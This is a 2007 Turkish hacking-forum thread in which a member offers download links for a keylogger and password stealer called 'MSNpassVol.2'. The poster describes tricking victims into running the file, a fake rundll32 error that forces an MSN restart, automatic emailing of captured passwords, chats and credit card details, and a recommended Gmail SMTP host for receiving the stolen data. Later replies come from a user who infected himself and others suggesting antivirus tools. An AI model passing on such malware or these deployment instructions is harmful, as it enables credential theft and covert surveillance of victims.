msn,yahoo vb herşeyin şifresi artık elinizde(garneet1 farkıyla)

garneet1

Yeni üye
4 Ocak 2007
32
0
MSNpassVol.2; kullanıcının girdiği tüm şifreleri [msn, admin, kredi kartı, forum vb...]
ele geçirebilen, chat programlarında [MSN, GTalk, Icq, Mirc vb..] kimlerle ne
konuşulduğu hakkında bilgi veren, kısaca karşı bilgisayardaki klavye kayıtlarını
düzenli bir şekilde size raporlayabilen programdır.

Program basit bi arayüze sahiptir bu yüzden yardım bölümü eklemedim,
kutulara ne dolduracağınızı veya butonların ne işe yaradığını öğrenmek
istiyorsanız nesnelerin üzerinde fareyle kısa bir süre bekleyin...

Ekran görüntüsü
https://tik.lat/pDIaH

Link1 : https://tik.lat/d8dxk

Link2 : https://tik.lat/DIUAx

(Rar şifresi içindedir)

Ayrıntılı Bilgi Almak İsteyen !

Öncelikle; bu program %100 işe yarıo eğer kurbana dosyayı bi şekilde yedirebilirseniz şifreler elinizde olcak!

Merhaba arkadaşlar, bi süredir kodlayıp kullandıım programı biras eklemeler yaparak sizlere sunuyorum.

Programın amacı; oluşturduğumuz dosyayı msn'den kurbana atınca bilgisayarındaki şifreler mail yoluyla bize geliyor.Eğer şaka yapmak isterseniz kurban size kendi elleriyle MSN şifresini yolluo nası oluo derseniz; kurban MSN'den düştüğünde tekrar online oluo ve size mesaj yollamak istio, sizin MSN pencerenizi açtığı anda şifreleri mesajla size iletmişi oluyo

Programın kullanımını fazla anlatmicam çünkü basit bi pro ve gerekli yardım programda mevcut..

*Dosyayı kurbana atıınızda "rundll32" hatası verio ve MSN zorla kapatılıo.Sonra kurbanımız MSN'i tekrar açıo ve bize programı sorcak ne işe yarıo die ama o bize bişey yazmadan şifreleri yolluo ...

*Eğer kurbanın şifreleri kayıtlıysa yaani MSN'e şifre yazarak girmiyosa sorun diil, kayıtlı şifreler mailinize ayrıca gelio.

---Programın alabildiği kayıtlı şifreler---

* MSN Messenger
* Windows Messenger (Windows XP)
* Yahoo Messenger (Versions 5.x ve 6.x)
* ICQ Lite 4.x/2003
* AOL Instant Messenger
* AOL Instant Messenger/Netscape 7
* Trillian
* Miranda
* GAIM

*Kurban bi kere dosyayı yediği zaman bilgisayarı kapatana kadar; kimlerle yazışmış hangi sitelere girmiş, girdiği veya kullandığı şifreli üyelikleri size mail yoluyla bildirir ve bildirme zaman aralığını ise kendiniz belirleyebilirsiniz

[Uyarı: Mail adresinizi yazdıktan sonra eğer bildiğiniz sağlam bi host yoksa program sizin yerinize bulabilir ama tavsiye etmiyorum mesela; hotmaile şifreler gitmio arasıra gidio kafasına göre takılıo, yahooyu denemedim, GMAİL herzaman çalışıo lütfen gmail kullanın sizi yarı yolda bırakmaz!Eğer Gmail kullanırsanız yardım bölümünde yazdıım gibi host yerine "gsmtp185.google.com" bunu yazarsanız şifreler direkt inboxa gelir spam olarak değerlendirilmez ve herzaman çalışan bi host!]

Kolay Gelsin..

GICIKX

Uzman üye
2 Ocak 2007
1,074
9
ya ben bunu yanlışlıkla açtım 30dk da bir mailime ne yaptığım geliyo bunu engellemenin bi yolu var mı arkadaşlar paylaşırsanız sevinirim

GICIKX

Uzman üye
2 Ocak 2007
1,074
9
kardeş anti virüs var symantec 30dk da bir sağ altta scannıng message diyo sonra mailime yolluyo yani baktım her yerde aradım kurduğum server dosyasınıda bulamadım

ibo_altan

Yeni üye
19 Ocak 2007
3
0
kaspersky internet security bu tarz programlara kesinlikle izin vermiyo onu tavsiye edebillirim sana ..hiç affı yok gerçekten . zaten bu serverı bulamazsın o altta çalışan işlemlere bulaşıyo ve önemli işlemlere bulaşıyo o yüzden boşuna serveri arama bulamazsın. sen yükle kasperskyi bak nasıl siliyo ama baya bi affallıyo silerken

GICIKX

Uzman üye
2 Ocak 2007
1,074
9
çok sağol ya ben kasperden de iyisini indiriyodum indiremedim mks duymuşsundur belki kasper çok kasıyo bilgisayarı o yüzden onu denemedim bide onu indiriyim tekrar tşk

ibo_altan

Yeni üye
19 Ocak 2007
3
0
kaspersky internet security 6.0 ı yükle .pcyi bi en başta iyi bi şekilde tarattır virüsler gitsin ardından ayarları minimuma indir hiç bir şekilde kasmıyo.. ve çok güvenli işini mutlaka görür..

slave_ss

Yeni üye
22 Ara 2006
17
0
Abi emeğe saygı;ama bunu kullanmak için karşı taraftaki adamın bunu yemesi lazım ayrıca diyelim ki karşı taraftaki adam msn'i açmıyor o zaman işe yaramaz............

vatann

Yeni üye
11 Ocak 2007
9
0
saol kardes emegıne saglık dosyayı kendı pc de actım ama calısmadı ben mı yapamadım acaba

Son düzenleme:

rock_girl001

Yeni üye
24 Ocak 2007
4
0
ya herkes yapabilmiş ama ben indirdim de denedim kendime ama hangi dosyayı göndericem gönderdiğim dosya tümüyle ona gidiyo yani benim indirdiğim neyse ona gidiyo ve bişi olmuyo...açıklarsanız sevinirim

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.